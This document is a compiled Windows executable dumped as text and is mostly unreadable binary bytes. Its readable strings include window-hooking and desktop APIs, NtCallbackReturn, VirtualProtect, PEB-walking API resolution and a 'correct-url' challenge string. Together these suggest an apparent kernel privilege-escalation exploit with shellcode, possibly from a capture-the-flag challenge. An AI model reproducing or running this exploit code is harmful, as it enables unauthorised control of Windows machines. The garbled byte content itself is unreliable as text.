C

ȊC

ȉw<O8C$?ȋC

C

ȊC

O@wDC$ȋC

C

ȊC

wLOH_U  VuWjYuup
  Puu jYu$u H
  Pu$uu P%  u$huP  P   P  @hP   hP  jYhPP  PhPP8P(	  hPP	  u(PhPm  hPC   hP#  }8jY}8jYuhP  DhuP  hP8Pu  u  u  8PhPLjH j P>03j hA 5l5h(  55PrЍP\  8PP}
  PhPue   u?  u#   ^]U   hVWuuP/   hP  hP  }hjY^]UMS]VW}/QC/ȋoȋEHpCoȋoȋC/ȋEHpoȋCoȋCoȋC/ȋEHpCoȋCoȋCoȋC /ȋo ȋEH p$o(ȋCo ȋCoȋC oȋC(/ȋCoȋEH(p,CoȋC(oȋCo(ȋC oȋo0ȋC0/ȋCo ȋEH0p4Co ȋCo(ȋC(oȋC0oȋC oo8ȋCo0ȋC8/ȋEH8p<C8oȋCo8ȋCo(ȋC(oȋCo0ȋC o ȋo@ȋC0oȋC@/ȋEH@pDC o(ȋC@oȋoHȋCH/ȋCo@ȋC0oȋCo0ȋC8oȋCo8ȋC(o ȋEHHpLCo8ȋC8oȋCHoȋC(o(ȋCoHȋC o0ȋC0o ȋC@oȋCo@ȋEHPpTCo@ȋC8o ȋC@oȋCoHȋC(o0ȋC o8ȋC0o(ȋCHoȋEHXp\CHoȋC8o(ȋCoHȋC(o8ȋC@o ȋC o@ȋC0o0ȋEHpdC oHȋC0o8ȋCHo ȋC8o0ȋC@o(ȋC(o@ȋEHhplC8o8ȋC(oHCHo(ȋC0o@ȋC@o0ȋEHpptC8o@ȋC@o8ȋC0oHȋCHo0ȋEHxp|CHo8ȋC8oHȋC@o@ȋE򉈀      CHo@ȋC@oHȋE򉈈   ȉ   CHoH_^      []UESVE   P `T EEWx3ҋXƋ
؋E0xP3ҋxX Ƌ؋EpPxmEu}WPwT O Ow3҃gP gT Ƌ
؋ExE_0^P[]UVW}      G@ODG@ODW@   wD   G8O<G8O<W8   w<   G0O4G0O4W0Wxw4w|G(O,G(O,W(Wpw,wtG O$G O$W Whw$wlGOGOWWwwdGOGOWWXww\GOGOWWPwwT O Ow_^]U   hVWuP/   hP*hP }hjY_^]US]VW} S oSC oȋGsɉK oȋGosɉKGoȋ o ȋGȉK s$Go ȋGoȋ o(ɉs,K(Go(ȋGo ȋGȋ o0s4ɉK0Go ȋ o8ȋGo(ȋGo0s<ɉK8Go8ȋGo(ȋ o@ȋGo0ȋG ȉK@sDG o(ȋGo8ȋGo@ȋGo0ȋ oHsLɉKHGo8ȋGoHȋG o0ȋGo@ȋG(sTɉKPGo@ȋG o8ȋG(o0ȋGoHs\ɉKXG(o8ȋGoHȋG o@ȋG0ȉKsdG oHȋG(o@ȋG0o8slɉKhG(oHȋG8ȋG0o@stɉKpG0oHȋG8o@s|ɉKxG8oHȋG@ȉ   򉳄   G@oH      GH_^      []UEVW}3׍HЋADA
D
AI
r_^]UM3Mы#ȋ#ȋ#ȋ#ȍ	#]US]VuW}
E
   73#37T73mvVu_U   } SVW  ]}u
  u   ;   P4j Pq;rFÍ4E3҅t}4ʊ0B;r}4P   u
މ}Y;sǊE0=453t43ҍ4ʊ
0B;r4Pj   }EY;r-tV4QP褤4P>   E
E΅tW4RPw24   3_U(SVuWEؘ^3^83^3   3   3F(3FP3Fx3   N3N,3NT3N|3   V3V<3Vd3   3   ~ 3~H3~p3   3   ]^3^@3^h3   3   EF3F03FX3   3   MN3N43N\3   3   U܋V3VD3Vl3   3   ]^$3^L3^t3   3   EMU
]E3ҋ]
ы33C33E
ˉA΋33E1K(1A,΋3HP3CT33EKPˉAT΋3Hx3C|33EKxˉA|3   3   33U      3ҋM܋E

Ë3H3C3M3EKˉAË3H03C43M3EK0ˉA43M1KX3E1A\3M1   3E3u3U1   1   1   ME3

ыË3H3C3M3EKˉAË3H83C<3M3EK8ˉA<Ë3H3Cd3M3EKˉAdË3   3   3M3E艋   ˋ]   3   3   3u3U艱   󉑴   3
Ӌ]
}3M31O1Aǋ3H@3M3GDO@3ËωADǋ3Hh3Gl3M3ÉOhωAl΋3   3   3M3É   ω   3   3   3u3Ӊ   ߉   3ҋME

3C$3K 3M3EK ˋ]A$3M1OH3Ë1ALǋ3Hp3Gt3M3ÉOpωAtǋ3   3M3      3Ëω   3   3   3u3Ӊ      qQYPyT3

΋uNPωFTF8V<E3
F<
ˉN83~Xʋv\]
U
ˉJXΉB\3       
 u
ω   ʉ   3      
U
ˉ   Ή   3ZR

u
ωNʉF3~(v,

UJ(B,   ϋ   3

΋u   ˉ   3~@vD 

ʋUJDωB@3      		

΋u   ʉ   3      
U
ˉ   Ή   3Z R$
u
ωN ʉF$3~xv|
U
ˉJxωB|3      	

΋u   ˉ   3      

ʋU   Ή   3ZhRl
u
ωNhʉFl3~vd 
U
ˉJωBd3ZR


΋uNˉF3      

ʋU   3   ΋ZpRt

ϋ}OpˉGt      E3 
   
ʉ   3_HLU܋
U
ΉJLωBH3r0R4
}
ˉO0ΉG43
G
ʉO O_wWEGEGEEM#Ή]3M@ ]EE@$EE
#3EAы#M3M#3EKˉAM܋#E#M33΋ӉBJEM#E#M33M܋GOME#M#E3E3MG$O G(O0_@w8W<EG,EG4DEEM#Ή]3M@H]EE@LEEK(#3EA,ы#M3M#3EK0ˉA4ǋM#E#M33ӉB<J8EM#E#M33M܋O@GDME#M#E3E3MOHGLGPOX_hwWdEGTEG\lEEM#Ή]3M@p]EE@tKPˉEE#3EATы#M3M#3EKXˉA\ǋM#E#M33ΉJMBdыE#M#E3M3ǋOhGlME#M#E3E3MOpGtGx            EG|E䋇      EEM#Ή]3M   ]EE   KxˉEE#3EA|ы#M3M#3E艋   ˉ   ǋM#E#M33΋Ӊ   M쉂   ыE#M3M#E3ǋ   M   #M3ME䉏   #E3E               E      E䋇      EEM#Ή]3M   ]EE      ˉEE#3E䉁   ы#M3M#3E艋   ˉ   ǋM#E#M33΋Ӌ򉊰   M쉂   #ME3M#E3ǉ   M   ыE#M#E3M3E      M؋1A1FM؁X<_^[]U} v]jh   uuuu]UEHЀ	w,0]at At  ]Ãbt(ttt t]ð]ð]ð ]ð]ð
]UMUVA1+;s3y t ;AwRQY^]UpSVW3ۍEj4SP]͗E]܉]Љ]ĉ]ȋ]]̃r;u{u{u	]̋u}XÉEjYEmE3@Ee 3!}3jZ}uuUE   ];]u2
M 9  O
  ;}F
    U؃b    y    HF  tEX  EÃ
  C]PAEY<
  C]
Q(EY<
  C]
QE
Y<
  C]
QEY<
  EME


ȉuE
ȋM%   =      E
Ã<
  C];\/
  C];u"
  C]PxY<
  C]PbEY<	  C]
QIEY<	  C]
Q0E
Y<	  uM  E@

ȉuE

ȋEwuu7Gu}I	     wtu?ɀ7L7}	    w2t뱋u7?$?ɀD7L7뾅t|u7$?D7?$?ɀD7L7yEuGM	>Eu7M
.Eu'M
EuMEu MG}@  \u
؉U.  "   u E  F߃e UtREu	~UE            tw؀ t t   KU   } tGF!kVNF kNFU|GFHUw   ؅'u7u @     ؄u   *C   EH;4   {/E*   CU   /uBu ~.   C];]!   <*t</       ] @  Ry>  ؃	  t      Ee   E  ؃	x  t؃j  a  =  t,v  @t:  U"{  [9  f  ns  t   {   0|9~	-	  jEPEPEPEP    } ]uEE}<0|<9~<
t<-t<et<Et<.uC];t؋Uu}Uu  Ue e e e }-uut=     jEPEPEPEP.  ?  u]Uu  EÃ   C];r  C];u  C];e  jEPEPEPEP    u3U@]
ЉuFU
  E
Ã  C];u  C];l  C];l  j DEÃt  C];ag  C];lZ  C];sM  C];e@  jEPEPEPEP
    Uu]UuW  jEPEPEPEP    Uu]Uu  jEPEPEPEP    uU] 3UNuM}^    ~x  >  F0E2  F  ,0<	   E@E܃t;      j j
uuă0  uU}ȋ}     uS     u
0u
։U0Ej j
pp  EUp~}t  kM
   EЉUES  
t6-t1.uYuT} b  Eue     n^  %   =   u
   Ё   -EЉU     uuBE܅   mPQQ]E]$  }ԃEu]UMu@Xu؀etEu]E   8u    n^e }   EЋف   EPQQ$
  uUN^   t%E8uNFىN ؉FF^Uz؃	            Ht'
tQ   U/      u 3U}FE؋ut
KU]tpʅu
ʀ   xEу} Uu#HtuH@4
kH@t@@;Ew@6uu
Ee uEXCmEEx
E]r4؋]ۋEEEtpPUYuuuEP
   YY3_UVutX& W}Ftt u#NtFIN4%FuvWYV6WYHkFFtu_^]US]u3EÙPQQ$u~	Mu[]UUS3VW9Z$   ME10@E9u0Ft8t   F@F   SPRzFu3lFtbkFSPRUFtǉF^>B jPR2ȃtE9uuE}AtJ3@_̋D$L$
ȋL$u	D$ S؋D$d$؋D$[                                                                                                                                                                                                                                                                                                       0 a     /   .   A : \       0123456789abcdef    /]0`;Pa0LO>;7!YH!K3-%/
a)!)@%B-IY5
FBRY  	NIH &


03AD#TK)HBSZ6Y$6MP[9X]


O!#"%[U5EU0,??"a:OUO1-L5(^M]F89AB\MI@FG!BZ-,Q=/Q$TY32H+Q.!a<98@@?5B5/XTa!=FbaC$LMXC&,K^-I)#c\G_&/Hc8^S,N9YU&HUDGBJ. 5B?S]. .     *   \       YLUSVW3d50   vvF~ 6f9Ou3u썵         PPPYq<\   Yw   SX_^[]L+st^t$0Cx,tP|$8@(D$4Ptt$<P;T$<w!2ff tf0|$0>ًt$8T$4;rSC`xtZGtOP  t=D$0ރ u_
t$   tJ#LQt$4  փ[W33t
<a|,
_VWSQL$<q<Txt\T$<Z $<J3t$<;t 8B
r$t$<R   Z3fz3һ   D$<ǋ D$<3Y[^Ëȭ=tw        vFz                                                                                                                                                                                       @                                                                         ,  x                              x                                                                                                                                                    @  @        x                       @  B                       ?                                                                                                                                                      @SH eH%   HL@XLeH%0   H  H9 uSHSTH  H   H  H   H  H   H  H   HH [  @USVWATAVAWHHHLE@E3L3Lu@HLuPLuAW    LuXAFeH4%0   LEPD$HIDt$@E3ɉD$8IH~(HEXHD$0H^(HM@Lt$(Lt$ AW0H~(HM@AWHx;HMPAW@HP0HUHt A   LEHUIAW(HUPIAW8A   AHA_A^A\_^[]H\$Hl$Ht$WH yP IHH}kHtfHW@H(HtE3HHAPeH%   HHHqHHtH{0 tHKHWt HH;u3ہCh @   fClH\$0Hl$8Ht$@H _H\$LD$UVWATAVHH@HHHQTHWE3H   H΋AWE3Aƅt	Eu3HHϻ       He@ HHuWLM@3fLEfE3ffEH}@ tZtVEtH_nH   EuH]@He0 HH]WLM03fLEfE3ffEHU0LHaHU@LHRH\$xH@A^A\_^]     USVW   _^[h3  AULeH%0   H@H eH%   H@H@0H@HȋU$   UHIA]33t <a|, RWVHHr<H3   HD@$LDHLʋX HDXAJ0H;t AuK4XA<HH3^_Z   HUSVWQHHb  @H   eH<%   HH0HWHw@H?f~ uHkernel32ut<as<9v :uHuHz  Hj    H   HL$Hq<H\HL$#   HL$   HL$SHHb  YHHsHtrHt$@HCpx,tbH|$0@(HHD$8PHtHt$(HPH;T$(w(2ff tf8HHH|$@H>HHHt$0H
T$8H;rLd$Ll$HHHCpxtmHHGtHHj  HtILL uWLLI$Ht'jZʅt#HTIr  I$IHHHLl$Ld$33t <a|, RWVHr<H3   HD@$LDHLʋX HDXAJ0H;t AuK4XA<H:H3^_Zí=t H                        vFz                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 4                                                                                                    D  x                            N  $                                                                                           ;      <                               @      @              @  @        R
   B      B              @  @        $    N      N              @  B                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               ?                                                                                                                                                                                                                                                                                                      STATIC          Global\                                                )    P?           t'    h?            *    X?    (       +    H?      
     D,    @?           +    p?    ntdll.dll       H	H   H#H             \ % S   \ % S   sysshadow       msctfime ui \   SCROLLBAR       \ B a s e N a m e d O b j e c t s \ % S         B   4 P  8  B   4 P  8  B   4 P  @  B   4 P  8  B   4 P  @  R   D   8  R   D   @  b0 @ h B P b0 @ h B P b0 @ h HB P b0 @ h B P b0 @ h B P b0 @ h B P b0 @ h HB P c1 X@ h pB P c1 X@ h pB P c2 X@ h pB P c1 X@ h pB P c1 X@ h pB P c2 X@ h pB P c2 X@ p A N c2 X@ p A N c2 X@ p A N c4 P8  C P c4 P8  C P d6 P8  G T d6 P8  G T e8 P8  J W e8 P8  J W e: P8   K X e: P8   K X e: P8   K X e? P8  (K X e< P8  (K X                                                                                  WHHIHH_HHt$HxHXD$(HtcHHt[HHtSAHtKIHH;w?LLLLHu": u
HHHuIIIItHtHH3HH$H|$Ht$Lы4  Lы4  Lы4  Lы4  Lы4  RWVSHr<H3   HD@$LDHLʋX HDXAJ0H"   ;t AuK4XA<HH3[^Z33t
<a|,
ASARAQAPRQQRL9  ZYHtD@EuH3ID@IHYZAXAYAZA[RWVSATHr<H3   HN$LNLȋN ~HD^AJiHI;t Au
K4\AH3A[^_ZHHXHhHpWH Q    3ÀYt
 H"eH%8   Hpf =MZ ut
HHHHHH2    L$(I[IkIsH _ÐS   II
xHHHHHHHIH[H       [WHH3H3HKVKVHHH=HHH"r=H    HP      H       Hu_SWHH
H=H;HD;HHH9HD9H;HT;Hs HÀ   Hs H   H9H
:[LLH2Hu
1H3HUSVW   _%5  %5  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %3  %2  %3  %2  %2  %4  %4  %4  % 4  %4  %4  %4  %4  %
4  %4  %4  %4  %4  %4  %4  %4  %4  %4  %4  % 4  %"4  %$4  %&4  %(4  %*4  %,4  %.4  %4  %4  %4  %4  %H4  %J4  %L4  %N4  %P4  %R4  %T4  %V4  %3  %2  H(H
1  Hu
H
1  H(H$Ht$WH HH33  HtLH׋>HHt$8HH$0H _H$WH H3{3  HHtM@HQDIHDE~29ZtBH;r
BBH;rAH(E;}ڋJZHHHH$0H _H$Hl$Ht$WH =-  d   ׹@   0  HHtND3H*  E3DHAI
3  =  uH0  ΅uxH
H0  3H$0Hl$8Ht$@H _H$Hl$Ht$WH@  HHHL$ 3      HD$ HHf9xu  H$0  /  t}H$0  LL  HA1  HL$ LHy  L1  E3HT$ H$0  /  t"HD$ H
HL$ fHIfu   L$@  I[IkIs I_HHXWH@H@T M HH@P   HP31    H$(LD$ fD$"HT$031  H$XOIH@_H$WH    IJAz   HHEA   Z   Jn H$08 H _@SH03HHL$ HD$ HD$(A   Hd$@ HT$@HL$ c/  HT$@HڊHuHL$@L/  H0[@SH E3A   HAP)     f!C @  f	Cc?KH [HtMH$Hl$Ht$WH HمtAAHHzHHuH$0Hl$8Ht$@H _HHXHpHxUHhH@  H
F  -    HL$ D3,'  $ B-  HH  r-     39)  wuf95)  )  u=)  HL$ 0/  y 3  H)  A
   D)      A;'    @8}:   D$,= (     =Z)     =98  ty=:  tY=?  t9=B  tJ)     L)     r  1)     3)      Y  )     )     @  (     )     '  (     (       (     =(     (     (     |$,98  t(     5(     (     (           u^M4@8}:u
t;t
5P(     A(     v5(      jt;t!(     V(  
   JD(  A;u(@8}:uE4fك
'  !'     u@8}:Ã'  L$@  I[IsI{ I]Ãu@8}:Ã΃u;tH@8}:u
u9='  t5uM4t;tf'     Z'     N'     M4q
t";t.'     '     Q='  FH\$UVWATAUAVAWHl$HP  eH<%0   H3H  H1:,  H   ;'  H2*    H0  Hth+  =&   |H  HtL   3HL$DBH|#  Hi
  HD$hHL$H&  HD$xH   HE*  fI          LJA(#  @  AՋLAՋLH z&  H   3LHt$XA   HL$PE3Ht$H3Ht$@D|$8Dt$0Dl$(Dd$ =*  H   H  '&  HsHH  L@M  HP D c%  H+A|H(  H H   HH  H+H  L  H  AuHW  L   WH)  HL$HD$h)  3f  Hr%  H   H|$XA   HD$PE3H|$H3H|$@D|$8Dt$0Dl$(Dd$ :)  LH  Hr  LH  (  L%  L
  |$0D$(|$    (  LHX  H  =5$  |7L)  I  H&  A  L  IH  H(  H   HH  H  L  L   ]  (  A   LAH  HLL(  Hc#      
u=#   J LHH7HDL
u(  H  DH  u(  LLHH  AH'  I
  E3LH%  H  HH  H    H   ,  L  H   H  @`  b&  H  AT$x'  AT$BED$hHM  fDeFH)  A   HLEY'  HvL
uH)e  HE3AP9'  Hv Lu,  %  H  LLǺ  '  "t3D9  uHM&  HM'  E3HME33'  uȉ  ID&  3   H$  HP  A_A^A]A_^]H$WH   H&  H  A   E   HH%  3HL$0DBP  Hd$( HD$0E3D$0P   3D$4    HHD$`D3"HD$ EAOt7H  HtH@PH;v!H
Hx@D3"u!     !     Ht	H%  H$   HĀ   _HHXHhHpHx AVH
5!  Ib$  HH=     0    t0u+H  H  $  Hǃ\     d     <        H;     HcC   H-H   u 4   HD<   H  L)e  H+     H H<AtI  LHuHI H   }ZHc   tHLT   JJ Hq  H=   E3ǃ     E33AQI$  H\$0Hl$8Ht$@H|$HH A^H\$Hl$ VWATAUAVHpHc7  L-<H uHFHAŨ  H   A    H  H   HHH  Ha  HHi      DIHHH%   H   LHH LEIH+HDD+H+DHA  L@  H   L  LD$@?   D$@HfD$hD$L$PU#  Hp  H#  L
VE333!  H  eH%0   HXxH  H  HH  HH  Hc
  HkHB*"   H  Ho    A       3|H  Hj  
H    HtLH@  H   H	H#HHH3  Ht!HEH#LHs  AE=   |	A;   E3HǄ$   @9E3H$     ^"     Hd$0 H$   d$( LH$   MD$  "  xxHc  HkB)$   HH  H       H;vJ
  E3D  3LHIL  t AԹ    H       L$pI[@IkHIA^A]A_^HHXHhHpHx AVHHI O  M|  3HH   Ãt tLMƋHI   t   jH   HHL$XA  PHD$PE3HL$HH|$@L$8L$0L$(L$   HϋH    HD  3L\$I[IkIs I{(IA^H%  H$UVWATAUAVAWHP3HHHu 3  L  DH  L  LL$(H$   b  L  H$   J(HLHD$   L$      DAEtHtA   HH$      A   I  H  A   HHLLAHH   H   H  
  H  A   H$   MHH3     L$   H$   L$   L$   A   MHH   tpH$   HT$0A   utAHH#H\0HT$    DMH   =@  |%H  DMH   HL$(M3  HH$   HPA_A^A]A_^]̋  H  L  |Hc  LHEMLL    } L   M   D   H$Hl$Ht$WH   3AIHHM   Au"Hci  
uAA7HH
   3HL$0H
DBP:  (   D$0P   D$4   u H$PH$XHd$( HD$0H  E3HD$ AQ	EAtEuD$4    H|$D$4   |$@Hd$( HD$0H  E33HD$ EAL$   I[IkIs I_H\$Hl$Ht$WATAUAVAWH LE3   A  HM  H    ;    D9        IH  Hc  EMBL L=
t
HHAAH    L;    Ah   Ƈ  AH  fDod uC*HHADH  A@  H   HHH  H  HHHHy  HHGH  H   O  	  H  E3DAQM<E3L    H)      H
E3AP  H[(HuH)e     LLH
I  H[ Hu޾   L;  u0   f9E u%D9X  uH    QX     u	I  H\$PHl$XHt$H A_A^A]A_LI[IsWH y  Hf;uIc IKE3APm     
j    HH   j  ;        vx   uoT   tfti=  }fuHN   fpuCH  ƃ  l  H  E3ɺ  A     H  T  ƃ  H  H\$8Ht$@H _H\$Ht$WH0  H     HH   H     ;  uxHO(HT$ A  H1H  tYH   uOHHL$   uH  9P  HHL$   u   tH(  H  L$0  I[IsI_H(=   tHd$8 HL$8E3AP  H(H(H%w  H\$WH H u    =l   Ht-Htp  ;  tHd$8 HL$8E3AP0  	H=  H\$0H _H(=   t&=   |Hd$8 HL$8E3AP  H(H(H%  H\$HT$HL$UVWATAUAVAWH   H  HH5  Ad   A3A3L A]AՋLAՋL3DCCHL$L  H
  H$   HL$hH)  H
N     HL$xH$   L$   HL$D  Hd$X H$   Ht$PA   Hd$H E3Hl$@Dl$8Dd$0AID|$(Dt$   HH[HuH!|$XDOHt$PHuH!|$HOHl$@E3Dl$8Dd$0D|$(Dt$   H$   H  H  P   Hd$X H#Ht$PA   Hd$H E3Hl$@Dl$8Dd$0AID|$(Dt$ <  HH[HuH$   Hİ   A_A^A]A\_^]HHXHhHpHx AVH Hc5T  HHkH3,H  LLL+  Ih  LHtF,  Ps5H˩  AHI,     LIH(  LHu5   } H%   H\$0H|$HHl$8Ht$@H A^H\$Hl$Ht$WATAUAVAWH L  3L  H3M  3E3D,  APswIN;HsIII  HHJ!H;t/II@H=  w JΩ  AAIHΉ,  0  Iǃ?~H@IH   wH\$PHl$XHt$H A_A^A]A_H$Ht$WH0H  E3IH  ML9t=LHL$ HMIH
@D$ 6   L$(A=  v L;uDYH$@Ht$HIcH0_̃=1   LL}3Ãz|    t/   33QT$L$2L$2AQ8L$A   A1IH%  H$Hl$Ht$WH H     L;IHHHBLÍP8  HHt,LúA   H
  DHH  L3H  H$0Hl$8Ht$@H _HH39P  u,PD$0   P  E3H  E3D$(D$   HHH$WH H   HǁT     uOH  HxHHt?H+  LH  H  L  H H  H  H$0H _H%x  H8A@HT$(HT$ D$ DD$$HH8̋
   |   PMø   ̋  H$WH =   H      
  H   Hy  H  Ha  Hi  HHHq  H        H  HT$@
  u9HL$@[
  H
t
  HH	H
  HL$@HL   HL$@5
  HD$@Hp  H  HT$HH  Hd$H H  
  HtE33H
  H$0H _@SH HHѹHHH
  5HH
  tɬJHH
  AHH
  {'3HH
  ĊHc
  3H9j
  H [HE3HHH;tIHI   r3L   H$Hl$Ht$ WAVAWH0L33  f  .
  HȺ   
  3H
     A)  N  HH  E333
  H  LD$PI H  H  LHD$(L3D$    3  HH      HH
     H
  H!l$(HL$PE3D$    E33J  LHt~HH0  
  :  H  t3H
  d     H
  L3h  I
  9-m	  u  \  ƃ9-O	  t   Ht	H  
	  
  H
#H9 t  H  IOH$XHl$HJXHt$hH0A_A^_HHXHpHx UAVAWHhH  3N
  H  eH%   HO  !  {      L  =   
t      =   8       3HD$@HD$HD$PHH  DH.HL$@LHH@89uE3CD0BIuLzH
    HL$D3Y  HL$D
  B  HL$HH@89ufHL$HH@89uLD$@3AHu   H|$0A   |$(E3ɉ$ AHL$DC   HHuDHUpHL$@   H|$0DC|$(HMpE3ɉ\$ Ax   HH   3H   й@   	  L  H|$ HDHL
   tMH^   D  HPE3D$    IaHtI+IHIHG     L$  I[(Is0I{8IA_A^]H\$Hl$VWAVH H  HD3l$@LpXCfuHc  Hk HHHP   I4LL$@HDB6	  t,HLL$@HHH   DD$@	  HrH\$HHl$PH A^_^H\$Hl$VWAVH H;  H3l$@LpXCfuHc  Hk HHHPH
I4HLL$@   HHDBu  t,HCLL$@H   DD$@HR  HrH\$HHl$PH A^_^H\$H|$ UHH03ۉ]|EHMfE3EHtjH   D$     A   HUE3IHHtALMHȍS DC@   t)HLM S fGHψGDE   H|$XH\$PH0]H(  3H9    Hc|  LHkH  B  BD  BD   BD  BD  BD  |  X  P  H  H
XH(%2   B   d  4 2
p
 
4 
2p d T  4 2p	 d T 4  p   4
 rp
 
4 
2p R0 20 d T  4 2p	 t, d 4 ( P  
 44  
p P     4  p  t	 d T  4 2  T 4 p
 t d T 4 
 4 
p P d T 4 p d T
 4  2p d 4  2p  d) 4( & 
p   B     4  2p B  !
 !4  ! pP  
 t	 d T  4 2 d T
 4
 2p d	 4 R
p d T  4 2p   
 
4 
2p b  
 
4 
2p 20
 d
 T 4
 Rp"
 "tw "dv "4u "p P   T
 4	 2p
 T  4	 2p t
 4
 R
P B                                                                                                                                                                                                                                                                                                                                              0  X   <  `    <    %  <  ,    $<      8<    
  P<  4    \<      h<      p<  4    x<      <       <  (    <      <    "  <  "  #  <  #  %  =  P&  l'  ,=  t'  )  @=  )    =    
  l=    
  =    >,  =  D,  ,  =  ,  l.  =  t.  >/  =  D/  $0  =  ,0  0  =  1  1  =  1  1  >  1  p2  >  x2  2  $>  2  3  ,>  3  4  8>  4  6  @>  6  9  X>  9  9  t>  9  :  >  :  F;  >  L;  ;  >                                  I       J      J      G      H      H      ,H      <H      JH      XH      hH      tH      H      H      H      H      H      H      H      H      H      I       I      ,I      :I      LI      I      tI      I      I      I      I      I      I      I       J              ,M      M              8J      JJ      jJ      |J      J      J      J      J      J      J      J      J      K      K      ,K      @K      PK      dK      tK      K      K      K      K      K      K      K      \J              G      G      HM              vL      L      L      L      L      L      L       M      >L      "L       L      VL              @G          G   D   E          *J   B  F          K  @C  G          M  @D  HF          <M  (C                      I       J      J      G      H      H      ,H      <H      JH      XH      hH      tH      H      H      H      H      H      H      H      H      H      I       I      ,I      :I      LI      I      tI      I      I      I      I      I      I      I       J              ,M      M              8J      JJ      jJ      |J      J      J      J      J      J      J      J      J      K      K      ,K      @K      PK      dK      tK      K      K      K      K      K      K      K      \J              G      G      HM              vL      L      L      L      L      L      L       M      >L      "L      
L      VL              _snwprintf  _stricmp  msvcrt.dll  GetCurrentProcess wGetSystemDirectoryW GetModuleHandleA  >LoadLibraryA  GlobalAlloc GlobalFree  zGetSystemInfo u CopyFileW IsWow64Process  TlsSetValue HeapFree  WaitForSingleObject GetCurrentThreadId  Sleep HeapAlloc SleepEx TlsGetValue  CreateEventA  SetThreadAffinityMask ReadFile  HeapCreate  VirtualProtect  SetPriorityClass  SetThreadPriority  CreateFileW ResumeThread   CreateFileA vGetSystemDirectoryA TerminateThread TlsAlloc   DeleteFileW R CloseHandle  CreateThread  GetFileSize QGetProcessHeap  TlsFree KERNEL32.dll  
UnhookWinEvent  SetWinEventHook j CreateMenu  >PostQuitMessage 	 AppendMenuA SetClassLongA SetParent SendMessageA  	TranslateMessage  m CreateWindowExA  DestroyMenu  DefWindowProcA  SRegisterClassA  GetClassLongA ShowWindow  SetThreadDesktop  GetClassNameA SetClassLongPtrW  <PostMessageA  SetWindowLongPtrW SetActiveWindow SetWindowPos   DestroyWindow  DispatchMessageA  \GetMessageA [ CreateDesktopA  J CloseDesktop  USER32.dll  RtlImageRvaToSection  NtQuerySystemInformation  RtlInitUnicodeString  1RtlQueryEnvironmentVariable_U RtlImageNtHeader  RtlGetVersion bRtlAllocateActivationContextStack  NtCallbackReturn  eRtlAllocateHeap  NtSetTimer  JRtlFreeHeap  NtCreateTimer ntdll.dll RpcStringFreeA  Great-Job.This-is-the-correct-url.challange.com  
UuidToStringA RPCRT4.dll  memset                                                                                                                                                                                    $   xȥإ                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 
l@ H@    m@ @     nk@ L@ (   Ek@ D@   
 j@ <@    j@ h@ g d i 3 2 . d l l   a d v a p i 3 2 . d l l     m s v c r t . d l l     r p c r t 4 . d l l     k e r n e l 3 2 . d l l     k e r n e l b a s e . d l l     u s e r 3 2 . d l l     STATIC              Global\                                         USVW   _^[h3  AULeH%0   H@H H}EHH3Hr HHH    HHtLUIHHHtNIIHHHt<IILHHt*IILI    HHtIIJIIA] sysshadow   msctfime ui SCROLLBAR   \ B a s e N a m e d O b j e c t s \ % S     * d P   8 l   * d P   8 l   * d P   8 l                               2 l T ( @ l   2 l X ( @ x (       C]2/ x  ( D B P C]20 x  ( D B P C]20 x  ( D B P C]20 x  ( D B P B\.0 x  ( D B P B\.0 x  ( 8 B P B\.0 x  ( 8 B P 5MhJ1   x H B P 5MhJ1   x H B P 5MhJ2   x H B P 5MhJ1   x H B P 5MhJ1   x H B P 5MhJ2   x H B P ANmV2   x P $A N ANmV2   x P $A N                           7]=
4   t  C P                           :_?!6   t  \G T                           =@$8   t  lJ W ?bB&8   t  lJ W CcC):   t  lK X                                                     ! ?   t  tK X  "<   t  tK X       9$\    
      L  L  GCTL   Y  .data   [  \  .rdata  L`     .rdata$zzzdbg   a  %  .text$mn         .bss       ,  .idata$5    ,  d   .idata$2         .idata$3      ,  .idata$4    Њ    .idata$6    UpERPhO@ ERPhM@ ERPhzC,(@ ERPh@ E RPhfU<@ E0RPh\@ E(RPh(i@ E8RPh@ E@RPhq@ EHRPh/Dԛ@ E
0@ HPEX[@ ETEEEEf fEEfMfE@@EЋE@@Ef} uEt[@ EnEEEEf fEEfMfE@@E̋E@@Ef} uEȔ[@ E   EEEEf fEEfMfE@@EȋE@@Ef} uEZ@ E   EEEEf fEEfMfE@@EċE@@Ef} uE([@ E   E܋E܉EEf fEEfMfE@@EE@@Ef} uE@[@ E   E؋E؉EEf fEEfMfE@@EE@@Ef} uE[@ E   EԋEԉEEf fEEfMfE@@EE@@Ef} uՋEEEM 
AtEEEM@ 
A$t	E   e E] U4VWe e e E0  e j@h 0  EPj EPj@ E} }
     E T  j@h 0  EPj EPj@ E} }
      E   jh 0  EPj EPj@ E} }
         @ }h T  h@ u3"  u>uhfEܙRPERPjE3QP@ E 3ɉẺMЋE܉EԋEE؍E̙RPjERP@ Eh   EPEPj @ E_^] Ue ES@ j@h 0  Pj h@ jME   Ӆ   VW=@ Ej7Y@ j@h 0  Pj h@ jE   ӅxO=@ Ej1Y[@ 3SSPhc@ fSS@ ha  V@ t
SV@ 
EPV@ _^E[]Ë
0@ s ru"4áp@  @  8@  @@  T@  5l@ QË
0@  |   PMø   UVuuUFEEPQ^] W   Ǉ@     u?  SX,t0
   hq@ j3@ hq@ j   @   [   Ј@ _39<  uh   RRR3@RP   <  ̈@ UQS   VWj_9}UC}WjS,@ t!WjAVw  MW
Vj S @ _ QЈ@ UQQ3V@=0@  W|OLt$t WP33UM2M2ʉ8MOT1N_^]U   S]VW3E   E9t;U
6ȋAEAMEsEH~ =   |	;t Eǋ_ USVW   3E3ۋ   EX  UE3(  Psu3@MtSM3Ex  ;t8F=  w,(  MQi  @(  3P_UGMF~ M`~_UQ0@ SVW3 } 1Zk|]@    
   E-(  Ps.i  @(  QPUGSqȅuǋ_UTS@ VWjd   _Wj Eu}  Wj Er  WjEg  WjE\  E}3E   j
Y
@ E؋}EԋEM  
